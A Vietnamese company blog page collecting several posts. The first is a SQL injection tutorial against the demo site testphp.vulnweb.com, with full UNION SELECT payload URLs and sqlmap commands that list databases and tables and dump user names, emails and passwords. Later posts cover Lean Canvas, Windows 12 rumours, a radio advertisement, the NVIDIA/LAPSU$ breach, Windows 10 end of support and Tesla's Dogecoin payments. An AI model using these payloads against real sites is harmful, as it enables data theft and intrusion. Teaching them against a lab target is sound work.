71/6 Củ Chi - Vĩnh Hải- Nha Trang
02583.835083
Thứ Hai-Thứ Bảy: 07:30 - 17:00
29 Jul 2022

Hướng dẫn khai thác lỗi SQL Injection cơ bản

Tấn công SQL injection có thể xảy ra khi một trang web cho người dùng thực thi câu lệnh SQL ngay trên trang Web hoặc thanh địa chỉ. Trong bài này, mình sẽ trình bày cách thực hiện một cuộc tấn công SQL Injection cơ bản trên một trang web và ở phần cuối, mình sẽ nói về công cụ SQLmap, công cụ này sẽ tự động hóa toàn bộ quy trình.

Cách để thực hiện một cuộc tấn công SQL Injection cơ bản

Trang web http://testphp.vulnweb.com/listproducts.php?cat=1 đang kiểm tra các lỗ hổng php. Mình sẽ sử dụng trang web này để thực hiện cuộc tấn công SQLi.

Cách để thực hiện một cuộc tấn công SQL Injection cơ bản

1. Tìm xem trang web có dễ bị tấn công SQL Injection hay không

Cách cơ bản và đơn giản nhất là kiểm tra URL của các trang bạn đang truy cập. Nếu URL có dạng http://testphp.vulnweb.com/listproducts.php?cat=1, nó là một mục tiêu tiềm năng. Để kiểm tra xem trang web có thực sự đang sử dụng SQL hay không, bạn có thể thêm \ hoặc một dấu ngoặc kép ” hoặc dấu ngoặc đơn ‘ ở cuối URL và xem liệu có gì trong trang thay đổi hoặc bạn gặp lỗi SQL hay không. Đối với hầu hết các trường hợp, lỗi sẽ như sau:

Nhưng lỗi cũng có thể là bất cứ điều gì khác. Đối với trang web http://testphp.vulnweb.com/listproducts.php?cat=1 khi mình thêm dấu ‘ ở cuối sẽ xuất hiện lỗi:

Hướng dẫn khai thác lỗi SQL Injection cơ bản 37

Vì vậy, mình đã kết luận rằng trang web này có thể bị tấn công SQL Injection http://testphp.vulnweb.com/listproducts.php?cat=1

Trong backend, ứng dụng có thể đang chạy một truy vấn tương tự như

SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'

Truy vấn được thực thi cho http://testphp.vulnweb.com/listproducts.php?cat=1′ sẽ là

SELECT * FROM XYZ_TABLE WHERE CAT=1'

Và bạn đã đoán đúng. Lệnh này sẽ tạo ra lỗi.

Chúng ta có thể sửa đổi truy vấn theo bất kỳ cách nào chúng ta muốn. Nếu mình thêm --+ vào cuối, truy vấn sẽ chạy mà không có lỗi. (--+ hoặc # về cơ bản sẽ comment bất kỳ thứ gì sau nó)

2. Tìm các Database hiện có

Bước tiếp theo sẽ là tìm hiểu các database – cơ sở dữ liệu hiện có. Chúng ta sẽ sử dụng ORDER BY. Nếu mình chạy http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, truy vấn MySQL tương ứng sẽ là

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

Điều này sẽ sắp xếp kết quả dựa trên cột thứ 5

Mình sẽ lặp lại quá trình này với số cột khác nhau cho đến khi mình nhận được số cột mà trang ngắt. Ví dụ: trong trường hợp này khi ORDER BY 12, trang sẽ bị ngắt. Bây giờ mình biết rằng tổng số cột là 11. Vì số cột là 11, nên mình sẽ chạy truy vấn select all 1,2,3,4,5,6,7,8,9,10,11.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11

Truy vấn MySQL tương ứng sẽ trông như này

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Bây giờ điều hướng đến trang web. Ở một số nơi, bạn sẽ tìm thấy một số từ 1 đến 11. Mình thấy số 7, 2 và 9.

Hướng dẫn khai thác lỗi SQL Injection cơ bản 38

Bây giờ mình biết rằng bất cứ thứ gì mình viết ở vị trí 7, 2 và 9 sẽ được hiển thị. Mình muốn current databaseuser vàversion, vì vậy mình sẽ thực thi

https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,user(),3,4,5,6,database(),8,version(),10,11 .

Lưu ý:%20 là ASCII cho space

Mình đã thay thế 2 bằng user(), 7 bằng database() và 9 bằng version().

Hướng dẫn khai thác lỗi SQL Injection cơ bản 39

Mình nhận được thông tin sau:

  • database — acuart
  • user — acuart@localhost
  • version — 8.0.22–0ubuntu0.20.04.2

3. Tìm Table và dữ liệu trong Table trong Database hiện tại

Một khi thông tin trên được thu thập, mọi thứ sẽ rất đơn giản. Để có được danh sách các bảng, mình sẽ chạy

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema%20=%27acuart%27

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'

information_schema là cơ sở dữ liệu mặc định chứa danh sách các bảng. Chúng ta sẽ sử dụng thông tin này để tìm ra tên bảng. acuart là tên cơ sở dữ liệu mà chúng ta nhận được từ bước trước.

Trang web sẽ giống như sau:

Hướng dẫn khai thác lỗi SQL Injection cơ bản 40

Chúng ta có một danh sách các bảng Table:

  • artists
  • carts
  • categ
  • featured
  • guestbook
  • pictures
  • products
  • users

4. Khám phá tên cột – Column trong Table

Khám phá các cột của bảng (column trong Table) users

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns where table_name=’users’

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'

Hướng dẫn khai thác lỗi SQL Injection cơ bản 41

Mình nhận được các tên cột là:

  • uname
  • pass
  • cc
  • address
  • email
  • name
  • phone

5. Tìm dữ liệu được lưu trữ trong Table

Để xem tên, email, mật khẩu của người dùng:

http://testphp.vulnweb.com/listproducts.php?cat=1%20union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

Hướng dẫn khai thác lỗi SQL Injection cơ bản 42

6. Sử dụng SQLmap để tấn công SQL Injection tự động

Nếu mình muốn sử dụng sqlmap để thực hiện việc trên, mình sẽ phải chạy các lệnh sau trên terminal của mình

  • sqlmap -u https//testphp.vulnweb.com/listproducts.php?cat=" --dbs để lấy danh sách cơ sở dữ liệuHướng dẫn khai thác lỗi SQL Injection cơ bản 43
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db: lấy cơ sở dữ liệu hiện tạiHướng dẫn khai thác lỗi SQL Injection cơ bản 44
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart: lấy danh sách các bảng trong ‘acuart’Hướng dẫn khai thác lỗi SQL Injection cơ bản 45
  • sqlmap -u"http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart: lấy các cột trong bảng ‘users’Hướng dẫn khai thác lỗi SQL Injection cơ bản 46
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"-T users -D acuart --dump: lưu trữ tất cả dữ liệu trong bảng users

Tóm tắt về tấn công SQL Injection

Cuộc tấn công SQL Injection là một trong những cuộc tấn công mạnh mẽ nhất mà hacker có thể thực hiện. Có nhiều cách để ngăn chặn SQL Injection, bạn có thể tham khảo tại đây.

25 Jul 2022

LeanCanvas – Lập kế hoạch kinh doanh trên một trang giấy thần dược cho startup

Tổng quan Lean Canvas là gì?

­­­­­Không cần đến một bản kế hoạch kinh doanh dài vài chục trang giấy và có thể ngốn của bạn vài tuần để hoàn thành, #LeanCanvas là mô hình giúp bạn có thể xây dựng hoặc phân tích một mô hình kinh doanh trên một trang giấy trong khoảng 20 – 30 phút. Thay vì lập ra một bản-kế-hoạch-hoàn-hảo ngay từ lần đầu hạ bút thì Lean Canvas hướng đến việc phát triển liên tục thông qua các bài kiểm tra thường xuyên và nhanh chóng các giả thiết ban đầu với thực tế trên thị trường và khách hàng. Lean Canvas là một phiên bản biến thể được Ash Maurya phát triển từ mô hình Business Model Canvas do Alexander Osterwalder đưa ra trong cuốn sách nổi tiếng có tên Business Model Generation.  Khác với mô hình Business Model Canvas được áp dụng  rộng rãi cho cả các doanh nghiệp mới và cũ (tham khảo mô hình Business Model Canvas của FacebooK và google tại đây) thì  Lean Canvas tập trung vào việc tiếp cận  từ khía cạnh tìm và giải quyết vấn đề nhằm phục vụ cho các đối tượng chính là các doanh nhân khởi nghiệp.

Lean Canvas được chia sẻ lần đầu trong một bài viết trên blog của tác giả có tên “How to Document your business Model On 1 Page” (tạm dịch: làm thể nào để lập mô hình kinh doanh trên một trang giấy) sau đó được trình bày đầy đủ trong cuốn Running Lean.

Các thành phần của một bảng Lean Canvas

Mô hình Lean Canvas được thúc đẩy bởi những phản hổi từ thị trường và triết lý của nó tập trung chủ yếu vào những việc không ngừng hoàn thiện để có được sản phẩm khả dụng tối thiểu tiếp theo. Phương pháp tinh gọn (Lean Methodology) phù hợp với startup bởi vì nó khuyến khích các doanh nhân khởi nghiệp trình bày rõ ràng các vấn đề và tránh tạo ra những sản phẩm sai và không cần thiết.

Nếu bạn muốn tạo 1 bảng Lean Canvas cho các ý tưởng có tính cạnh tranh của mình thì bạn cần hoàn thành 9 yếu tố sau đây trong bảng kế hoạch kinh doanh đó:

  1. Problem (vấn đề): đa số các Startup thất bại trong việc “tạo ra đúng sản phẩm” chứ không phải là “tạo ra sản phẩm đúng cách”. Cách doanh nhân khởi nghiệp thường đánh giá sai nhu cầu của khách hàng, vấn đề từ thị trường là nguyên nhân chính dẫn đến thất bại. Do đó hiểu rõ và tìm hiểu các vấn đề là yếu tố đầu tiên của mô hình. Lưu ý: Ở giai đoạn đầu nên giới hạn trong phạm vi 3 vấn đề mấu chốt mà bạn muốn giải quyết cho khách hàng.
  2. Customer Segments (CS- Phân khúc khách hàng): Các nhóm khách hàng chính mà bạn hướng đến là ai?
  3. Unique Value Proposition (UVP – Đề xuất giá trị khác biệt): Những ưu điểm mang tính cạnh tranh của mô hình khởi nghiệp của bạn là gì? Với khách hàng, đâu là lý do quan trọng nhất khiến họ chọn mua sản phẩm của bạn?
  4. Solution (Giải pháp): Các đặc điểm của sản phẩm hoặc dịch vụ giúp khách hàng giải quyết vấn đề của họ. Nên nhớ là bạn không thể giải quyết mọi vấn đề một lúc. Theo Lean Startup thì bạn nên lựa chọn những tính năng có tính hữu dụng tối thiếu trước sau đó dần hoàn thiện nâng cấp để phù hợp với nhưng đối tượng khác nhau đã trong vòng phản hồi cốt lõi của Lean Startup bao gồm Xây dựng – Đo lường – Học hỏi.
  5. Key Metrics (Chỉ số chủ chốt): Startup thường dễ bị nhấm chìm trong núi số liệu để có thể sắp xếp các biến số không chắc chắn đó. Tuy nhiên ở bất kỳ thời điểm nào cũng chỉ có một vài hoạt động chính mang lại giá trị. Vậy nên các doanh nhân khởi nghiệp cần tìm ra và tập trung vào 1 số hành hoạt động chính. Lưu ý rằng điều này cũng có tính rủi ro nếu bạn xác định sai có thể gây ra lãng phí.
  6. Revenue streams (Nguồn thu nhập): Nguồn thu nhập của bạn đến từ đâu?
  7. Cost Structure (Chi phí): Các chi phí mà công ty phải bỏ ra ví dụ như chi phí phân phối, lương, thưởng,v.v.
  8. Channels (Kênh bán hàng): Các cách để tiếp cận khách hàng. Bạn nên liệt kê rõ cách kênh có trả phí và không. Bình thường sẽ có 4 loại kênh chính là: truyền thông, phân phối, bán hàng và chăm sóc khách hàng.
  9. Unfair Advantage (Lợi thế cạnh tranh độc quyền): Đây là phần khó hoàn thiện nhất với các Startup. Nó là những gì bạn có mà đối thủ hoặc người khác khó có thể mua hoặc sao chép được. Đây là yếu tố sống còn của 1 startup bạn nên liên tục dành thời gian suy nghĩ về vấn đề này cà tìm ra những lợi thế cạnh tranh của mình.

Facebook Lean Canvas

Dưới đây là hình ảnh ví dụ cụ thể về mô hình Lean Canvas của Facebook:

Ngày nay, khi thế giới ngày càng biến động và đổi mới không ngừng, việc đòi hỏi những cách làm mới đem lại hiệu quả hơn, linh hoạt hơn để đáp ứng được với nhu cầu thị trường ngày càng được đề cao hơn bao giờ hết. Việc xây dựng một mô hình Lean Canvas sẽ giúp bạn có một cái nhìn tổng quát hơn về một mô hình kinh doanh để kế hợp với các mô hình làm việc khác như Agile để phát triển nó. Agile được du nhập và rất phát triển tại Việt Nam, Agile cho phép các doanh nghiệp linh hoạt hơn, hiệu quả hơn. Một số đối tác nổi bật của Học viện Agile có thể kể tới như Viettel, FPT Software, Techcombank, Colgate, GameLoft, …

19 Jul 2022

Nhiều người còn chưa “lên đời” Windows 11, nhưng Windows 12 có thể sắp ra mắt

Năm ngoái, Microsoft đã thông báo rằng họ sẽ cung cấp bản cập nhật tính năng hàng năm cho Windows 10 và Windows 11, nhưng có vẻ như công ty sẽ phát hành những bản cập nhật lớn một cách “truyền thống” hơn, đó chính là phát hành luôn phiên bản Windows mới.

Theo thông tin từ Windows Central, Microsoft đang quay lại chu kỳ phát hành ba năm cho các phiên bản “chính” của Windows. Nguồn tin của Windows Central cho biết thêm rằng bản phát hành lớn tiếp theo được lên kế hoạch vào năm 2024, có tên mã là Next Valley.

Chúng ta sẽ có Windows 12 vào năm 2024? - Ảnh 1.

Kể từ Windows 10 năm 2015, Microsoft đã rời khỏi chu kỳ ba năm và ưu tiên ý tưởng Windows như một dịch vụ. Nghĩa là thay vì một bản Windows mới với các tính năng lớn, Windows 10 được cập nhật hai lần một năm với các tính năng mới. Windows 10 từng được một nhân viên của Microsoft mô tả là “phiên bản cuối cùng của Windows”.

Tuy nhiên, cuối cùng Microsoft đã phát hành Windows 11 vào năm ngoái và chuyển sang cập nhật hàng năm cho cả Windows 10 và 11.

Với việc Microsoft chuyển sang thương hiệu Windows 11, có khả năng bất kỳ phiên bản cập nhật lớn nào trong tương lai cũng sẽ thay đổi thương hiệu. Cho đến nay, chúng ta vẫn chưa thấy Microsoft áp dụng Windows 11.1 hoặc 11.2 với các bản cập nhật Windows 11 lớn, vì vậy Windows 12 là cái tên đang được mong đợi nhất.

Chúng ta sẽ có Windows 12 vào năm 2024? - Ảnh 2.

Cùng với phiên bản Windows năm 2024 đang được phát triển, Microsoft vẫn giữ kế hoạch cập nhật Windows 11 trong những năm tới. Bản cập nhật lớn tiếp theo, 22H2, hiện dự kiến sẽ phát hành vào tháng 9 hoặc tháng 10.

Microsoft được cho là đã loại bỏ kế hoạch phát hành bản cập nhật thường niên 23H2, thay vào đó sẽ ưu tiên tung ra các tính năng mới trong suốt năm 2023.

Trong cuộc khảo sát mới nhất của AdDuplex vào 6 năm 2022, Windows 11 đang chiếm 23,1% thị phần máy tính. Một con số khá khiêm tốn so với Windows 10.

Nhiều người còn chưa &quot;lên đời&quot; Windows 11, nhưng Windows 12 có thể sắp ra mắt - Ảnh 3.

Microsoft chưa chính thức đưa ra lộ trình phát hành Windows của mình. Công ty đã nỗ lực đổi mới Windows trong hai năm qua, sau khi đại dịch giúp tăng lượng khách hàng sử dụng Windows. Microsoft ban đầu dự định tung ra Windows 10X trên các thiết bị màn hình kép, nhưng sau đó đã chuyển hướng Windows 10X sang Windows 11 mà chúng ta biết ngày nay.

Tham khảo: TheVerge

11 Jul 2022

Bộ đàm Motorola CP 550

Bộ đàm Motorola CP-550

Thông số kỹ thuật
– Dãy tần: UHF 400-470Mhz.
– Số kênh: 16 kênh tần số sử dụng công nghệ mã hóa tín hiệu giúp giảm thiểu nhiễu tín hiệu.
– Công suất phát : 8W (UHF).
– Pin khủng 10000mAh mang lại thời gian đàm thoại dài
– Đèn báo trạng thái tín hiệu và Pin xạc
– Trọng lượng: 200g.
– Kích thước nhỏ gọn
– Trọn bộ bao gồm: Thân máy, antenna, Pin sạc, adaptor, Sạc bàn, bát cài lưng .
Cự ly liên lạc:
+ Nội thành 1 – 2 Km.
+ Ngoại thành 2 – 3 Km
+ Điều kiện lý tưởng 3 – 5 Km
+ Dùng từ 20 đến 30 tầng
Ứng dụng sử dụng
– Sử dụng cho bảo vệ các tòa nhà, nhà hàng khách sạn
– Dùng cho liên lạc tại các công trình xây dựng, Bảo vệ, Công xưởng lớn nhỏ.
Liên hệ: 0975 53 51 52 – Mrs Trâm để được tư vấn
Những lý do bạn nên chọn lựa mua bộ đàm tại chúng tôi:
http://lntnhatrang.vn/ban-bo-dam-tai-nha-trang/

 

 

02 Mar 2022

NVIDIA bị tố hack lại, cài cả ransomware vào máy chủ của hacker

NVIDIA là tên tuổi lớn tiếp theo trở thành mục tiêu ghé thăm của tin tặc trong năm 2022. Theo báo cáo từ Telegraph, nhà sản xuất phần cứng máy tính Hoa Kỳ dường như đã phải hứng chịu một cuộc tấn công nghiêm trọng, có thể ảnh hưởng đến phần lớn hoạt động kinh doanh của hãng trên toàn thế giới.

Theo các nguồn tin trong ngành, NVIDIA bị tấn công bởi nhóm hacker LAPSU$ có nguồn gốc từ Nam Mỹ. Nhóm này có thể đã đánh cắp khoảng 1TB dữ liệu độc quyền của NVIDIA.

Nhóm LAPSU$ đe dọa rằng nếu NVIDIA không loại bỏ những giới hạn liên quan tới khả năng khai thác tiền ảo trên các mẫu card màn hình của hãng thì chúng sẽ công khai số dữ liệu đánh cắp được. Link tải gói dữ liệu 1TB được cho là của NVIDIA hiện đang được chia sẻ trên Telegram nhưng chưa được xác thực.

 NVIDIA

Tuy nhiên có vẻ như NVIDIA đã có động thái phản đòn nhóm hacker kể trên.

Một ngày sau khi tuyên bố hack vào máy chủ NVIDIA, nhóm LAPSU$ lên tiếng tố cáo NVIDIA là tội phạm. Chúng cho biết NVIDIA đã tấn công thẳng vào máy chủ riêng của chúng và mã hóa tất cả số dữ liệu mà chúng đánh cắp được. Không những vậy tất cả những dữ liệu khác của hacker cũng bị NVIDIA cài ransomware.

Rất may là, theo nhóm hacker, chúng đã tạo ra bản sao lưu của các tập tin nên không bị ảnh hưởng quá nhiều.

Hacker buộc tội ngược NVIDIA
Hacker buộc tội ngược NVIDIA

Khi được hỏi về vụ việc bị hack cũng như vụ phản đòn hacker, đại diện NVIDIA chỉ chia sẻ rằng: “Chúng tôi đang điều tra một sự cố bảo mật. Không có bất kỳ thông tin bổ sung nào để chia sẻ vào lúc này”.

Theo The Telegraph, máy chủ mail và máy chủ phân phối phần mềm của NVIDIA đã bị xâm nhập. Như đã nói, NVIDIA chưa chia sẻ gì về những ảnh hưởng của vụ hack tới khách hàng và người dùng của hãng. Ngoài ra, thông tin NVIDIA phản đòn hoàn toàn có thể là do nhóm hacker LAPSU$ tự bịa ra.

Theo quantrimang.com

08 Feb 2022

Thời điểm Microsoft ngừng hỗ trợ các phiên bản Windows 10 và những thông tin cần biết

Chính sách hỗ trợ Windows 10 sẽ kết thúc vào tháng 10 năm 2025

Microsoft đã cập nhật tài liệu chính thức để xác định ngày ngừng hỗ trợ (khai tử) Windows 10. Theo đó, công ty sẽ chỉ duy trì hỗ trợ các phiên bản Windows 10 Home, Windows 10 Pro, Windows 10 Enterprise và Windows 10 Education cho đến ngày 14 tháng 10 năm 2025

Sau mốc thời gian này, người dùng các bản Windows 10 kể trên sẽ không còn nhận được bất cứ dịch vụ hỗ trợ cũng như những bản cập nhật bảo mật quan trọng nào từ Microsoft.

Sau khi gói hỗ trợ Windows 10 kết thúc, bạn cần nâng cấp lên Windows 11 để tiếp tục nhận các bản cập nhật bảo mật cần thiết cho hệ thống. Trong thế giới internet toàn cầu hoá như hiện nay, những cập nhật này là rất cần thiết để duy trì quyền riêng tư cá nhân và bảo mật dữ liệu của người dùng.

Để đảm bảo an toàn cũng như trải nghiệm, Microsoft luôn khuyên người dùng hãy cập nhật lên phiên bản Windows mới nhất trong thời gian sớm nhất có thể. Microsoft cũng có chính sách ép hệ thống của người dùng tự cập nhật nếu như phiên bản Windows mà họ sử dụng quá cũ.

Windows 11

Khi nào Windows 10 sẽ ngừng nhận các bản cập nhật bảo mật?

Như đã đề cập phía trên, Windows 10 Home, Pro, Education, Enterprise và IoT Enterprise sẽ không còn nhận được các bản cập nhật bảo mật sau ngày 14 tháng 10 năm 2025.

Tuy nhiên, Windows LTSC, phiên bản Windows chuyên biệt dành cho các doanh nghiệp cần hỗ trợ lâu dài, sẽ tiếp tục nhận được các bản cập nhật trong một vài năm nữa sau đó. Cụ thể, Windows 10 2019 LTSC và Windows 10 IoT 2019 LTSC sẽ ngừng nhận các bản cập nhật bảo mật từ ngày 9 tháng 1 năm 2029.

Nhìn chung, sau khi các bản cập nhật bảo mật dừng phân phối, người dùng sẽ có nguy cơ cao gặp phải các vấn đề về bảo mật. Bất kỳ lỗ hổng mới nào được tìm thấy trên Windows 10 sau mốc thời gian khai tử có thể không được Microsoft vá (mặc dù những trường hợp ngoại lệ hiếm gặp đã xảy ra). Vì vậy tốt nhất là hãy nâng cấp lên Windows 11 trước tháng 10 năm 2025. Về mặt tích cực, Windows 11 bao gồm nhiều tính năng mới hữu ích, và cũng không phải là một bản nâng cấp khó khăn.

Tôi có thể tiếp tục sử dụng Windows 10 trong bao lâu?

Windows 10 sẽ không ngừng hoạt động sau ngày 14 tháng 10 năm 2025, ngay cả khi Microsoft ngừng cung cấp các bản cập nhật bảo mật. Điều đó có nghĩa là về mặt kỹ thuật, bạn có thể tiếp tục sử dụng hệ điều hành như bình thường, nhưng đây nhìn chung không phải là một ý kiến hay.

Với thực trạng các cuộc tấn công lừa đảo tinh vi, khai thác từ xa và ransomware có xu hướng ngày càng phổ biến như hiện nay, việc mạo hiểm dữ liệu cá nhân khi sử dụng hệ điều hành không còn được hỗ trợ rõ ràng là không nên.

14 Jan 2022

Tesla chính thức cho phép thanh toán một số sản phẩm của mình bằng Dogecoin

Tesla đã chính thức chấp nhận thanh toán và niêm yết một số sản phẩm của mình bằng đồng tiền mã hóa Dogecoin. CEO Elon Musk cũng đã đăng tải trên trang Twitter cá nhân về thông báo này. Giá Dogecoin ngay lập tức tăng mạnh.

Tesla chính thức cho phép thanh toán một số sản phẩm của mình bằng Dogecoin

 - Ảnh 1.

Như chiếc thắt lưng Giga Texas có giá bán là 835 DOGE, chiếc xe địa hình Cyberquad for Kids có giá là 12.020 DOGE, chiếc còi Cyberwhistle có giá là 300 DOGE.

Trên trang bán hàng trực tuyến của Tesla, các sản phẩm trong mục Lifestyle, như Giga Texas Belt Buckle, Cyberquad for Kids và Cyberwhistle đều được niêm yết giá bán bằng đồng Dogecoin.

Tesla chính thức cho phép thanh toán một số sản phẩm của mình bằng Dogecoin

 - Ảnh 2.

Hồi đầu tháng trước, CEO Elon Musk cũng đã tiết lộ rằng Tesla sẽ cho phép một số sản phẩm của mình được mua bằng Dogecoin và để xem tình hình sẽ diễn ra như thế nào. Giờ đây thì điều đó đã trở thành hiện thực.

Tuy nhiên, Tesla hiện vẫn chưa cho phép mua các mẫu xe ô tô điện của mình bằng Dogecoin. Có lẽ sẽ cần thêm một thời gian thử nghiệm nữa, trước khi chính thức chấp nhận Dogecoin như một phương thức thanh toán cho tất cả các sản phẩm của Tesla. Hoặc cũng có thể lại là một chiêu trò đẩy giá của tỷ phú Elon Musk.

Theo genk.vn